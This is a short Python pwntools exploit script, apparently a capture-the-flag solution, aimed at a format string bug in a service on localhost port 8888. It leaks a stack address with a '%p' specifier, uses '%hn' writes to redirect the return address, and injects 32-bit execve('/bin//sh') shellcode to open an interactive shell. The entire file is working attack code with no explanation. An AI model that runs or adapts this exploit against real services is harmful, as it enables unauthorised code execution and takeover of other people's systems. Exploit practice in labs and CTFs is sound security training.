ebp.py

1. from pwn import *
2. import time
3.  
4. def hackIt():
5.     HOST = '127.0.0.1'
6.     PORT = 8888
7.     r = remote(HOST, PORT)
8.     raw_input("debug?")
9.    
10.     # leak_ebp_echo
11.     offset = 4
12.     leak_ebp_echo = "%"+str(offset)+"$p"
13.     r.sendline(leak_ebp_echo)
14.     ebp_echo = r.recvuntil("\n")
15.     ret_main_16 = int(ebp_echo,16)+4
16.    
17.     # overwrite pointer to ret address
18.     offset = 4
19.     payload = "%"+str(ret_main_16&0xffff)+"x%"+str(offset)+"$hn"
20.     r.sendline(payload)
21.    
22.     # overwrite ret to buf (shellcode)
23.     shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
24.     payload = shellcode
25.     pad = (0x0804A080&0xffff)-len(payload)
26.     offset = 12
27.     payload += "%"+str(pad)+"x%"+str(offset)+"$hn"
28.    
29.     r.sendline(payload)
30.     r.interactive()
31. hackIt()